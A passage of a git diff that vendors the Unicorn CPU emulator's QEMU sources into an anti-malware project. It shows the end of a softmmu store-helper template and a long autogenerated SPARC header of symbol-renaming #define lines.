MMUSUFFIX)(env, addr + i, val8, + mmu_idx, retaddr + GETPC_ADJ); + if (env->invalid_error != UC_ERR_OK) + break; + } + uc->size_recur_mem = 0; + return; + } + + /* Handle aligned access or unaligned access in the same page. */ +#ifdef ALIGNED_ONLY + if ((addr & (DATA_SIZE - 1)) != 0) { + cpu_unaligned_access(ENV_GET_CPU(env), addr, MMU_DATA_STORE, + mmu_idx, retaddr); + env->invalid_addr = addr; + env->invalid_error = UC_ERR_WRITE_UNALIGNED; + cpu_exit(uc->current_cpu); + return; + } +#endif + + haddr = (uintptr_t)(addr + env->tlb_table[mmu_idx][index].addend); + glue(glue(st, SUFFIX), _be_p)((uint8_t *)haddr, val); +} +#endif /* DATA_SIZE > 1 */ + +void +glue(glue(helper_st, SUFFIX), MMUSUFFIX)(CPUArchState *env, target_ulong addr, + DATA_TYPE val, int mmu_idx) +{ + helper_te_st_name(env, addr, val, mmu_idx, GETRA()); +} + +#endif /* !defined(SOFTMMU_CODE_ACCESS) */ + +#undef READ_ACCESS_TYPE +#undef SHIFT +#undef DATA_TYPE +#undef SUFFIX +#undef LSUFFIX +#undef DATA_SIZE +#undef ADDR_READ +#undef WORD_TYPE +#undef SDATA_TYPE +#undef USUFFIX +#undef SSUFFIX +#undef BSWAP +#undef TGT_BE +#undef TGT_LE +#undef CPU_BE +#undef CPU_LE +#undef helper_le_ld_name +#undef helper_be_ld_name +#undef helper_le_lds_name +#undef helper_be_lds_name +#undef helper_le_st_name +#undef helper_be_st_name +#undef helper_te_ld_name +#undef helper_te_st_name diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/sparc.h b/ai_anti_malware/unicorn/unicorn-master/qemu/sparc.h new file mode 100644 index 0000000..4fbf55e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/sparc.h @@ -0,0 +1,3092 @@ +/* Autogen header for Unicorn Engine - DONOT MODIFY */ +#ifndef UNICORN_AUTOGEN_SPARC_H +#define UNICORN_AUTOGEN_SPARC_H +#define arm_release arm_release_sparc +#define aarch64_tb_set_jmp_target aarch64_tb_set_jmp_target_sparc +#define ppc_tb_set_jmp_target ppc_tb_set_jmp_target_sparc +#define use_idiv_instructions_rt use_idiv_instructions_rt_sparc +#define tcg_target_deposit_valid tcg_target_deposit_valid_sparc +#define helper_power_down helper_power_down_sparc +#define check_exit_request check_exit_request_sparc +#define address_space_unregister address_space_unregister_sparc +#define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_sparc +#define phys_mem_clean phys_mem_clean_sparc +#define tb_cleanup tb_cleanup_sparc +#define memory_map memory_map_sparc +#define memory_map_ptr memory_map_ptr_sparc +#define memory_unmap memory_unmap_sparc +#define memory_free memory_free_sparc +#define free_code_gen_buffer free_code_gen_buffer_sparc +#define helper_raise_exception helper_raise_exception_sparc +#define tcg_enabled tcg_enabled_sparc +#define tcg_exec_init tcg_exec_init_sparc +#define memory_register_types memory_register_types_sparc +#define cpu_exec_init_all cpu_exec_init_all_sparc +#define vm_start vm_start_sparc +#define resume_all_vcpus resume_all_vcpus_sparc +#define a15_l2ctlr_read a15_l2ctlr_read_sparc +#define a64_translate_init a64_translate_init_sparc +#define aa32_generate_debug_exceptions aa32_generate_debug_exceptions_sparc +#define aa64_cacheop_access aa64_cacheop_access_sparc +#define aa64_daif_access aa64_daif_access_sparc +#define aa64_daif_write aa64_daif_write_sparc +#define aa64_dczid_read aa64_dczid_read_sparc +#define aa64_fpcr_read aa64_fpcr_read_sparc +#define aa64_fpcr_write aa64_fpcr_write_sparc +#define aa64_fpsr_read aa64_fpsr_read_sparc +#define aa64_fpsr_write aa64_fpsr_write_sparc +#define aa64_generate_debug_exceptions aa64_generate_debug_exceptions_sparc +#define aa64_zva_access aa64_zva_access_sparc +#define aarch64_banked_spsr_index aarch64_banked_spsr_index_sparc +#define aarch64_restore_sp aarch64_restore_sp_sparc +#define aarch64_save_sp aarch64_save_sp_sparc +#define accel_find accel_find_sparc +#define accel_init_machine accel_init_machine_sparc +#define accel_type accel_type_sparc +#define access_with_adjusted_size access_with_adjusted_size_sparc +#define add128 add128_sparc +#define add16_sat add16_sat_sparc +#define add16_usat add16_usat_sparc +#define add192 add192_sparc +#define add8_sat add8_sat_sparc +#define add8_usat add8_usat_sparc +#define add_cpreg_to_hashtable add_cpreg_to_hashtable_sparc +#define add_cpreg_to_list add_cpreg_to_list_sparc +#define addFloat128Sigs addFloat128Sigs_sparc +#define addFloat32Sigs addFloat32Sigs_sparc +#define addFloat64Sigs addFloat64Sigs_sparc +#define addFloatx80Sigs addFloatx80Sigs_sparc +#define add_qemu_ldst_label add_qemu_ldst_label_sparc +#define address_space_access_valid address_space_access_valid_sparc +#define address_space_destroy address_space_destroy_sparc +#define address_space_destroy_dispatch address_space_destroy_dispatch_sparc +#define address_space_get_flatview address_space_get_flatview_sparc +#define address_space_init address_space_init_sparc +#define address_space_init_dispatch address_space_init_dispatch_sparc +#define address_space_lookup_region address_space_lookup_region_sparc +#define address_space_map address_space_map_sparc +#define address_space_read address_space_read_sparc +#define address_space_rw address_space_rw_sparc +#define address_space_translate address_space_translate_sparc +#define address_space_translate_for_iotlb address_space_translate_for_iotlb_sparc +#define address_space_translate_internal address_space_translate_internal_sparc +#define address_space_unmap address_space_unmap_sparc +#define address_space_update_topology address_space_update_topology_sparc +#define address_space_update_topology_pass address_space_update_topology_pass_sparc +#define address_space_write address_space_write_sparc +#define addrrange_contains addrrange_contains_sparc +#define addrrange_end addrrange_end_sparc +#define addrrange_equal addrrange_equal_sparc +#define addrrange_intersection addrrange_intersection_sparc +#define addrrange_intersects addrrange_intersects_sparc +#define addrrange_make addrrange_make_sparc +#define adjust_endianness adjust_endianness_sparc +#define all_helpers all_helpers_sparc +#define alloc_code_gen_buffer alloc_code_gen_buffer_sparc +#define alloc_entry alloc_entry_sparc +#define always_true always_true_sparc +#define arm1026_initfn arm1026_initfn_sparc +#define arm1136_initfn arm1136_initfn_sparc +#define arm1136_r2_initfn arm1136_r2_initfn_sparc +#define arm1176_initfn arm1176_initfn_sparc +#define arm11mpcore_initfn arm11mpcore_initfn_sparc +#define arm926_initfn arm926_initfn_sparc +#define arm946_initfn arm946_initfn_sparc +#define arm_ccnt_enabled arm_ccnt_enabled_sparc +#define arm_cp_read_zero arm_cp_read_zero_sparc +#define arm_cp_reset_ignore arm_cp_reset_ignore_sparc +#define arm_cpu_do_interrupt arm_cpu_do_interrupt_sparc +#define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_sparc +#define arm_cpu_finalizefn arm_cpu_finalizefn_sparc +#define arm_cpu_get_phys_page_debug arm_cpu_get_phys_page_debug_sparc +#define arm_cpu_handle_mmu_fault arm_cpu_handle_mmu_fault_sparc +#define arm_cpu_initfn arm_cpu_initfn_sparc +#define arm_cpu_list arm_cpu_list_sparc +#define cpu_loop_exit cpu_loop_exit_sparc +#define arm_cpu_post_init arm_cpu_post_init_sparc +#define arm_cpu_realizefn arm_cpu_realizefn_sparc +#define arm_cpu_register_gdb_regs_for_features arm_cpu_register_gdb_regs_for_features_sparc +#define arm_cpu_register_types arm_cpu_register_types_sparc +#define cpu_resume_from_signal cpu_resume_from_signal_sparc +#define arm_cpus arm_cpus_sparc +#define arm_cpu_set_pc arm_cpu_set_pc_sparc +#define arm_cp_write_ignore arm_cp_write_ignore_sparc +#define arm_current_el arm_current_el_sparc +#define arm_dc_feature arm_dc_feature_sparc +#define arm_debug_excp_handler arm_debug_excp_handler_sparc +#define arm_debug_target_el arm_debug_target_el_sparc +#define arm_el_is_aa64 arm_el_is_aa64_sparc +#define arm_env_get_cpu arm_env_get_cpu_sparc +#define arm_excp_target_el arm_excp_target_el_sparc +#define arm_excp_unmasked arm_excp_unmasked_sparc +#define arm_feature arm_feature_sparc +#define arm_generate_debug_exceptions arm_generate_debug_exceptions_sparc +#define gen_intermediate_code gen_intermediate_code_sparc +#define gen_intermediate_code_pc gen_intermediate_code_pc_sparc +#define arm_gen_test_cc arm_gen_test_cc_sparc +#define arm_gt_ptimer_cb arm_gt_ptimer_cb_sparc +#define arm_gt_vtimer_cb arm_gt_vtimer_cb_sparc +#define arm_handle_psci_call arm_handle_psci_call_sparc +#define arm_is_psci_call arm_is_psci_call_sparc +#define arm_is_secure arm_is_secure_sparc +#define arm_is_secure_below_el3 arm_is_secure_below_el3_sparc +#define arm_ldl_code arm_ldl_code_sparc +#define arm_lduw_code arm_lduw_code_sparc +#define arm_log_exception arm_log_exception_sparc +#define arm_reg_read arm_reg_read_sparc +#define arm_reg_reset arm_reg_reset_sparc +#define arm_reg_write arm_reg_write_sparc +#define restore_state_to_opc restore_state_to_opc_sparc +#define arm_rmode_to_sf arm_rmode_to_sf_sparc +#define arm_singlestep_active arm_singlestep_active_sparc +#define tlb_fill tlb_fill_sparc +#define tlb_flush tlb_flush_sparc +#define tlb_flush_page tlb_flush_page_sparc +#define tlb_set_page tlb_set_page_sparc +#define arm_translate_init arm_translate_init_sparc +#define arm_v7m_class_init arm_v7m_class_init_sparc +#define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_sparc +#define ats_access ats_access_sparc +#define ats_write ats_write_sparc +#define bad_mode_switch bad_mode_switch_sparc +#define bank_number bank_number_sparc +#define bitmap_zero_extend bitmap_zero_extend_sparc +#define bp_wp_matches bp_wp_matches_sparc +#define breakpoint_invalidate breakpoint_invalidate_sparc +#define build_page_bitmap build_page_bitmap_sparc +#define bus_add_child bus_add_child_sparc +#define bus_class_init bus_class_init_sparc +#define bus_info bus_info_sparc +#define bus_unparent bus_unparent_sparc +#define cache_block_ops_cp_reginfo cache_block_ops_cp_reginfo_sparc +#define cache_dirty_status_cp_reginfo cache_dirty_status_cp_reginfo_sparc +#define cache_test_clean_cp_reginfo cache_test_clean_cp_reginfo_sparc +#define call_recip_estimate call_recip_estimate_sparc +#define can_merge can_merge_sparc +#define capacity_increase capacity_increase_sparc +#define ccsidr_read ccsidr_read_sparc +#define check_ap check_ap_sparc +#define check_breakpoints check_breakpoints_sparc +#define check_watchpoints check_watchpoints_sparc +#define cho cho_sparc +#define clear_bit clear_bit_sparc +#define clz32 clz32_sparc +#define clz64 clz64_sparc +#define cmp_flatrange_addr cmp_flatrange_addr_sparc +#define code_gen_alloc code_gen_alloc_sparc +#define commonNaNToFloat128 commonNaNToFloat128_sparc +#define commonNaNToFloat16 commonNaNToFloat16_sparc +#define commonNaNToFloat32 commonNaNToFloat32_sparc +#define commonNaNToFloat64 commonNaNToFloat64_sparc +#define commonNaNToFloatx80 commonNaNToFloatx80_sparc +#define compute_abs_deadline compute_abs_deadline_sparc +#define cond_name cond_name_sparc +#define configure_accelerator configure_accelerator_sparc +#define container_get container_get_sparc +#define container_info container_info_sparc +#define container_register_types container_register_types_sparc +#define contextidr_write contextidr_write_sparc +#define core_log_global_start core_log_global_start_sparc +#define core_log_global_stop core_log_global_stop_sparc +#define core_memory_listener core_memory_listener_sparc +#define cortexa15_cp_reginfo cortexa15_cp_reginfo_sparc +#define cortex_a15_initfn cortex_a15_initfn_sparc +#define cortexa8_cp_reginfo cortexa8_cp_reginfo_sparc +#define cortex_a8_initfn cortex_a8_initfn_sparc +#define cortexa9_cp_reginfo cortexa9_cp_reginfo_sparc +#define cortex_a9_initfn cortex_a9_initfn_sparc +#define cortex_m3_initfn cortex_m3_initfn_sparc +#define count_cpreg count_cpreg_sparc +#define countLeadingZeros32 countLeadingZeros32_sparc +#define countLeadingZeros64 countLeadingZeros64_sparc +#define cp_access_ok cp_access_ok_sparc +#define cpacr_write cpacr_write_sparc +#define cpreg_field_is_64bit cpreg_field_is_64bit_sparc +#define cp_reginfo cp_reginfo_sparc +#define cpreg_key_compare cpreg_key_compare_sparc +#define cpreg_make_keylist cpreg_make_keylist_sparc +#define cp_reg_reset cp_reg_reset_sparc +#define cpreg_to_kvm_id cpreg_to_kvm_id_sparc +#define cpsr_read cpsr_read_sparc +#define cpsr_write cpsr_write_sparc +#define cptype_valid cptype_valid_sparc +#define cpu_abort cpu_abort_sparc +#define cpu_arm_exec cpu_arm_exec_sparc +#define cpu_arm_gen_code cpu_arm_gen_code_sparc +#define cpu_arm_init cpu_arm_init_sparc +#define cpu_breakpoint_insert cpu_breakpoint_insert_sparc +#define cpu_breakpoint_remove cpu_breakpoint_remove_sparc +#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_sparc +#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_sparc +#define cpu_can_do_io cpu_can_do_io_sparc +#define cpu_can_run cpu_can_run_sparc +#define cpu_class_init cpu_class_init_sparc +#define cpu_common_class_by_name cpu_common_class_by_name_sparc +#define cpu_common_exec_interrupt cpu_common_exec_interrupt_sparc +#define cpu_common_get_arch_id cpu_common_get_arch_id_sparc +#define cpu_common_get_memory_mapping cpu_common_get_memory_mapping_sparc +#define cpu_common_get_paging_enabled cpu_common_get_paging_enabled_sparc +#define cpu_common_has_work cpu_common_has_work_sparc +#define cpu_common_initfn cpu_common_initfn_sparc +#define cpu_common_noop cpu_common_noop_sparc +#define cpu_common_parse_features cpu_common_parse_features_sparc +#define cpu_common_realizefn cpu_common_realizefn_sparc +#define cpu_common_reset cpu_common_reset_sparc +#define cpu_dump_statistics cpu_dump_statistics_sparc +#define cpu_exec_init cpu_exec_init_sparc +#define cpu_flush_icache_range cpu_flush_icache_range_sparc +#define cpu_gen_init cpu_gen_init_sparc +#define cpu_get_clock cpu_get_clock_sparc +#define cpu_get_real_ticks cpu_get_real_ticks_sparc +#define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_sparc +#define cpu_handle_debug_exception cpu_handle_debug_exception_sparc +#define cpu_handle_guest_debug cpu_handle_guest_debug_sparc +#define cpu_inb cpu_inb_sparc +#define cpu_inl cpu_inl_sparc +#define cpu_interrupt cpu_interrupt_sparc +#define cpu_interrupt_handler cpu_interrupt_handler_sparc +#define cpu_inw cpu_inw_sparc +#define cpu_io_recompile cpu_io_recompile_sparc +#define cpu_is_stopped cpu_is_stopped_sparc +#define cpu_ldl_code cpu_ldl_code_sparc +#define cpu_ldub_code cpu_ldub_code_sparc +#define cpu_lduw_code cpu_lduw_code_sparc +#define cpu_memory_rw_debug cpu_memory_rw_debug_sparc +#define cpu_mmu_index cpu_mmu_index_sparc +#define cpu_outb cpu_outb_sparc +#define cpu_outl cpu_outl_sparc +#define cpu_outw cpu_outw_sparc +#define cpu_physical_memory_clear_dirty_range cpu_physical_memory_clear_dirty_range_sparc +#define cpu_physical_memory_get_clean cpu_physical_memory_get_clean_sparc +#define cpu_physical_memory_get_dirty cpu_physical_memory_get_dirty_sparc +#define cpu_physical_memory_get_dirty_flag cpu_physical_memory_get_dirty_flag_sparc +#define cpu_physical_memory_is_clean cpu_physical_memory_is_clean_sparc +#define cpu_physical_memory_is_io cpu_physical_memory_is_io_sparc +#define cpu_physical_memory_map cpu_physical_memory_map_sparc +#define cpu_physical_memory_range_includes_clean cpu_physical_memory_range_includes_clean_sparc +#define cpu_physical_memory_reset_dirty cpu_physical_memory_reset_dirty_sparc +#define cpu_physical_memory_rw cpu_physical_memory_rw_sparc +#define cpu_physical_memory_set_dirty_flag cpu_physical_memory_set_dirty_flag_sparc +#define cpu_physical_memory_set_dirty_range cpu_physical_memory_set_dirty_range_sparc +#define cpu_physical_memory_unmap cpu_physical_memory_unmap_sparc +#define cpu_physical_memory_write_rom cpu_physical_memory_write_rom_sparc +#define cpu_physical_memory_write_rom_internal cpu_physical_memory_write_rom_internal_sparc +#define cpu_register cpu_register_sparc +#define cpu_register_types cpu_register_types_sparc +#define cpu_restore_state cpu_restore_state_sparc +#define cpu_restore_state_from_tb cpu_restore_state_from_tb_sparc +#define cpu_single_step cpu_single_step_sparc +#define cpu_tb_exec cpu_tb_exec_sparc +#define cpu_tlb_reset_dirty_all cpu_tlb_reset_dirty_all_sparc +#define cpu_to_be64 cpu_to_be64_sparc +#define cpu_to_le32 cpu_to_le32_sparc +#define cpu_to_le64 cpu_to_le64_sparc +#define cpu_type_info cpu_type_info_sparc +#define cpu_unassigned_access cpu_unassigned_access_sparc +#define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_sparc +#define cpu_watchpoint_insert cpu_watchpoint_insert_sparc +#define cpu_watchpoint_remove cpu_watchpoint_remove_sparc +#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_sparc +#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_sparc +#define crc32c_table crc32c_table_sparc +#define create_new_memory_mapping create_new_memory_mapping_sparc +#define csselr_write csselr_write_sparc +#define cto32 cto32_sparc +#define ctr_el0_access ctr_el0_access_sparc +#define ctz32 ctz32_sparc +#define ctz64 ctz64_sparc +#define dacr_write dacr_write_sparc +#define dbgbcr_write dbgbcr_write_sparc +#define dbgbvr_write dbgbvr_write_sparc +#define dbgwcr_write dbgwcr_write_sparc +#define dbgwvr_write dbgwvr_write_sparc +#define debug_cp_reginfo debug_cp_reginfo_sparc +#define debug_frame debug_frame_sparc +#define debug_lpae_cp_reginfo debug_lpae_cp_reginfo_sparc +#define define_arm_cp_regs define_arm_cp_regs_sparc +#define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_sparc +#define define_debug_regs define_debug_regs_sparc +#define define_one_arm_cp_reg define_one_arm_cp_reg_sparc +#define define_one_arm_cp_reg_with_opaque define_one_arm_cp_reg_with_opaque_sparc +#define deposit32 deposit32_sparc +#define deposit64 deposit64_sparc +#define deregister_tm_clones deregister_tm_clones_sparc +#define device_class_base_init device_class_base_init_sparc +#define device_class_init device_class_init_sparc +#define device_finalize device_finalize_sparc +#define device_get_realized device_get_realized_sparc +#define device_initfn device_initfn_sparc +#define device_post_init device_post_init_sparc +#define device_reset device_reset_sparc +#define device_set_realized device_set_realized_sparc +#define device_type_info device_type_info_sparc +#define disas_arm_insn disas_arm_insn_sparc +#define disas_coproc_insn disas_coproc_insn_sparc +#define disas_dsp_insn disas_dsp_insn_sparc +#define disas_iwmmxt_insn disas_iwmmxt_insn_sparc +#define disas_neon_data_insn disas_neon_data_insn_sparc +#define disas_neon_ls_insn disas_neon_ls_insn_sparc +#define disas_thumb2_insn disas_thumb2_insn_sparc +#define disas_thumb_insn disas_thumb_insn_sparc +#define disas_vfp_insn disas_vfp_insn_sparc +#define disas_vfp_v8_insn disas_vfp_v8_insn_sparc +#define do_arm_semihosting do_arm_semihosting_sparc +#define do_clz16 do_clz16_sparc +#define do_clz8 do_clz8_sparc +#define do_constant_folding do_constant_folding_sparc +#define do_constant_folding_2 do_constant_folding_2_sparc +#define do_constant_folding_cond do_constant_folding_cond_sparc +#define do_constant_folding_cond2 do_constant_folding_cond2_sparc +#define do_constant_folding_cond_32 do_constant_folding_cond_32_sparc +#define do_constant_folding_cond_64 do_constant_folding_cond_64_sparc +#define do_constant_folding_cond_eq do_constant_folding_cond_eq_sparc +#define do_fcvt_f16_to_f32 do_fcvt_f16_to_f32_sparc +#define do_fcvt_f32_to_f16 do_fcvt_f32_to_f16_sparc +#define do_ssat do_ssat_sparc +#define do_usad do_usad_sparc +#define do_usat do_usat_sparc +#define do_v7m_exception_exit do_v7m_exception_exit_sparc +#define dummy_c15_cp_reginfo dummy_c15_cp_reginfo_sparc +#define dummy_func dummy_func_sparc +#define dummy_section dummy_section_sparc +#define _DYNAMIC _DYNAMIC_sparc +#define _edata _edata_sparc +#define _end _end_sparc +#define end_list end_list_sparc +#define eq128 eq128_sparc +#define ErrorClass_lookup ErrorClass_lookup_sparc +#define error_copy error_copy_sparc +#define error_exit error_exit_sparc +#define error_get_class error_get_class_sparc +#define error_get_pretty error_get_pretty_sparc +#define error_setg_file_open error_setg_file_open_sparc +#define estimateDiv128To64 estimateDiv128To64_sparc +#define estimateSqrt32 estimateSqrt32_sparc +#define excnames excnames_sparc +#define excp_is_internal excp_is_internal_sparc +#define extended_addresses_enabled extended_addresses_enabled_sparc +#define extended_mpu_ap_bits extended_mpu_ap_bits_sparc +#define extract32 extract32_sparc +#define extract64 extract64_sparc +#define extractFloat128Exp extractFloat128Exp_sparc +#define extractFloat128Frac0 extractFloat128Frac0_sparc +#define extractFloat128Frac1 extractFloat128Frac1_sparc +#define extractFloat128Sign extractFloat128Sign_sparc +#define extractFloat16Exp extractFloat16Exp_sparc +#define extractFloat16Frac extractFloat16Frac_sparc +#define extractFloat16Sign extractFloat16Sign_sparc +#define extractFloat32Exp extractFloat32Exp_sparc +#define extractFloat32Frac extractFloat32Frac_sparc +#define extractFloat32Sign extractFloat32Sign_sparc +#define extractFloat64Exp extractFloat64Exp_sparc +#define extractFloat64Frac extractFloat64Frac_sparc +#define extractFloat64Sign extractFloat64Sign_sparc +#define extractFloatx80Exp extractFloatx80Exp_sparc +#define extractFloatx80Frac extractFloatx80Frac_sparc +#define extractFloatx80Sign extractFloatx80Sign_sparc +#define fcse_write fcse_write_sparc +#define find_better_copy find_better_copy_sparc +#define find_default_machine find_default_machine_sparc +#define find_desc_by_name find_desc_by_name_sparc +#define find_first_bit find_first_bit_sparc +#define find_paging_enabled_cpu find_paging_enabled_cpu_sparc +#define find_ram_block find_ram_block_sparc +#define find_ram_offset find_ram_offset_sparc +#define find_string find_string_sparc +#define find_type find_type_sparc +#define _fini _fini_sparc +#define flatrange_equal flatrange_equal_sparc +#define flatview_destroy flatview_destroy_sparc +#define flatview_init flatview_init_sparc +#define flatview_insert flatview_insert_sparc +#define flatview_lookup flatview_lookup_sparc +#define flatview_ref flatview_ref_sparc +#define flatview_simplify flatview_simplify_sparc +#define flatview_unref flatview_unref_sparc +#define float128_add float128_add_sparc +#define float128_compare float128_compare_sparc +#define float128_compare_internal float128_compare_internal_sparc +#define float128_compare_quiet float128_compare_quiet_sparc +#define float128_default_nan float128_default_nan_sparc +#define float128_div float128_div_sparc +#define float128_eq float128_eq_sparc +#define float128_eq_quiet float128_eq_quiet_sparc +#define float128_is_quiet_nan float128_is_quiet_nan_sparc +#define float128_is_signaling_nan float128_is_signaling_nan_sparc +#define float128_le float128_le_sparc +#define float128_le_quiet float128_le_quiet_sparc +#define float128_lt float128_lt_sparc +#define float128_lt_quiet float128_lt_quiet_sparc +#define float128_maybe_silence_nan float128_maybe_silence_nan_sparc +#define float128_mul float128_mul_sparc +#define float128_rem float128_rem_sparc +#define float128_round_to_int float128_round_to_int_sparc +#define float128_scalbn float128_scalbn_sparc +#define float128_sqrt float128_sqrt_sparc +#define float128_sub float128_sub_sparc +#define float128ToCommonNaN float128ToCommonNaN_sparc +#define float128_to_float32 float128_to_float32_sparc +#define float128_to_float64 float128_to_float64_sparc +#define float128_to_floatx80 float128_to_floatx80_sparc +#define float128_to_int32 float128_to_int32_sparc +#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_sparc +#define float128_to_int64 float128_to_int64_sparc +#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_sparc +#define float128_unordered float128_unordered_sparc +#define float128_unordered_quiet float128_unordered_quiet_sparc +#define float16_default_nan float16_default_nan_sparc +#define float16_is_quiet_nan float16_is_quiet_nan_sparc +#define float16_is_signaling_nan float16_is_signaling_nan_sparc +#define float16_maybe_silence_nan float16_maybe_silence_nan_sparc +#define float16ToCommonNaN float16ToCommonNaN_sparc +#define float16_to_float32 float16_to_float32_sparc +#define float16_to_float64 float16_to_float64_sparc +#define float32_abs float32_abs_sparc +#define float32_add float32_add_sparc +#define float32_chs float32_chs_sparc +#define float32_compare float32_compare_sparc +#define float32_compare_internal float32_compare_internal_sparc +#define float32_compare_quiet float32_compare_quiet_sparc +#define float32_default_nan float32_default_nan_sparc +#define float32_div float32_div_sparc +#define float32_eq float32_eq_sparc +#define float32_eq_quiet float32_eq_quiet_sparc +#define float32_exp2 float32_exp2_sparc +#define float32_exp2_coefficients float32_exp2_coefficients_sparc +#define float32_is_any_nan float32_is_any_nan_sparc +#define float32_is_infinity float32_is_infinity_sparc +#define float32_is_neg float32_is_neg_sparc +#define float32_is_quiet_nan float32_is_quiet_nan_sparc +#define float32_is_signaling_nan float32_is_signaling_nan_sparc +#define float32_is_zero float32_is_zero_sparc +#define float32_is_zero_or_denormal float32_is_zero_or_denormal_sparc +#define float32_le float32_le_sparc +#define float32_le_quiet float32_le_quiet_sparc +#define float32_log2 float32_log2_sparc +#define float32_lt float32_lt_sparc +#define float32_lt_quiet float32_lt_quiet_sparc +#define float32_max float32_max_sparc +#define float32_maxnum float32_maxnum_sparc +#define float32_maxnummag float32_maxnummag_sparc +#define float32_maybe_silence_nan float32_maybe_silence_nan_sparc +#define float32_min float32_min_sparc +#define float32_minmax float32_minmax_sparc +#define float32_minnum float32_minnum_sparc +#define float32_minnummag float32_minnummag_sparc +#define float32_mul float32_mul_sparc +#define float32_muladd float32_muladd_sparc +#define float32_rem float32_rem_sparc +#define float32_round_to_int float32_round_to_int_sparc +#define float32_scalbn float32_scalbn_sparc +#define float32_set_sign float32_set_sign_sparc +#define float32_sqrt float32_sqrt_sparc +#define float32_squash_input_denormal float32_squash_input_denormal_sparc +#define float32_sub float32_sub_sparc +#define float32ToCommonNaN float32ToCommonNaN_sparc +#define float32_to_float128 float32_to_float128_sparc +#define float32_to_float16 float32_to_float16_sparc +#define float32_to_float64 float32_to_float64_sparc +#define float32_to_floatx80 float32_to_floatx80_sparc +#define float32_to_int16 float32_to_int16_sparc +#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_sparc +#define float32_to_int32 float32_to_int32_sparc +#define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_sparc +#define float32_to_int64 float32_to_int64_sparc +#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_sparc +#define float32_to_uint16 float32_to_uint16_sparc +#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_sparc +#define float32_to_uint32 float32_to_uint32_sparc +#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_sparc +#define float32_to_uint64 float32_to_uint64_sparc +#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_sparc +#define float32_unordered float32_unordered_sparc +#define float32_unordered_quiet float32_unordered_quiet_sparc +#define float64_abs float64_abs_sparc +#define float64_add float64_add_sparc +#define float64_chs float64_chs_sparc +#define float64_compare float64_compare_sparc +#define float64_compare_internal float64_compare_internal_sparc +#define float64_compare_quiet float64_compare_quiet_sparc +#define float64_default_nan float64_default_nan_sparc +#define float64_div float64_div_sparc +#define float64_eq float64_eq_sparc +#define float64_eq_quiet float64_eq_quiet_sparc +#define float64_is_any_nan float64_is_any_nan_sparc +#define float64_is_infinity float64_is_infinity_sparc +#define float64_is_neg float64_is_neg_sparc +#define float64_is_quiet_nan float64_is_quiet_nan_sparc +#define float64_is_signaling_nan float64_is_signaling_nan_sparc +#define float64_is_zero float64_is_zero_sparc +#define float64_le float64_le_sparc +#define float64_le_quiet float64_le_quiet_sparc +#define float64_log2 float64_log2_sparc +#define float64_lt float64_lt_sparc +#define float64_lt_quiet float64_lt_quiet_sparc +#define float64_max float64_max_sparc +#define float64_maxnum float64_maxnum_sparc +#define float64_maxnummag float64_maxnummag_sparc +#define float64_maybe_silence_nan float64_maybe_silence_nan_sparc +#define float64_min float64_min_sparc +#define float64_minmax float64_minmax_sparc +#define float64_minnum float64_minnum_sparc +#define float64_minnummag float64_minnummag_sparc +#define float64_mul float64_mul_sparc +#define float64_muladd float64_muladd_sparc +#define float64_rem float64_rem_sparc +#define float64_round_to_int float64_round_to_int_sparc +#define float64_scalbn float64_scalbn_sparc +#define float64_set_sign float64_set_sign_sparc +#define float64_sqrt float64_sqrt_sparc +#define float64_squash_input_denormal float64_squash_input_denormal_sparc +#define float64_sub float64_sub_sparc +#define float64ToCommonNaN float64ToCommonNaN_sparc +#define float64_to_float128 float64_to_float128_sparc +#define float64_to_float16 float64_to_float16_sparc +#define float64_to_float32 float64_to_float32_sparc +#define float64_to_floatx80 float64_to_floatx80_sparc +#define float64_to_int16 float64_to_int16_sparc +#define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_sparc +#define float64_to_int32 float64_to_int32_sparc +#define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_sparc +#define float64_to_int64 float64_to_int64_sparc +#define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_sparc +#define float64_to_uint16 float64_to_uint16_sparc +#define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_sparc +#define float64_to_uint32 float64_to_uint32_sparc +#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_sparc +#define float64_to_uint64 float64_to_uint64_sparc +#define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_sparc +#define float64_trunc_to_int float64_trunc_to_int_sparc +#define float64_unordered float64_unordered_sparc +#define float64_unordered_quiet float64_unordered_quiet_sparc +#define float_raise float_raise_sparc +#define floatx80_add floatx80_add_sparc +#define floatx80_compare floatx80_compare_sparc +#define floatx80_compare_internal floatx80_compare_internal_sparc +#define floatx80_compare_quiet floatx80_compare_quiet_sparc +#define floatx80_default_nan floatx80_default_nan_sparc +#define floatx80_div floatx80_div_sparc +#define floatx80_eq floatx80_eq_sparc +#define floatx80_eq_quiet floatx80_eq_quiet_sparc +#define floatx80_is_quiet_nan floatx80_is_quiet_nan_sparc +#define floatx80_is_signaling_nan floatx80_is_signaling_nan_sparc +#define floatx80_le floatx80_le_sparc +#define floatx80_le_quiet floatx80_le_quiet_sparc +#define floatx80_lt floatx80_lt_sparc +#define floatx80_lt_quiet floatx80_lt_quiet_sparc +#define floatx80_maybe_silence_nan floatx80_maybe_silence_nan_sparc +#define floatx80_mul floatx80_mul_sparc +#define floatx80_rem floatx80_rem_sparc +#define floatx80_round_to_int floatx80_round_to_int_sparc +#define floatx80_scalbn floatx80_scalbn_sparc +#define floatx80_sqrt 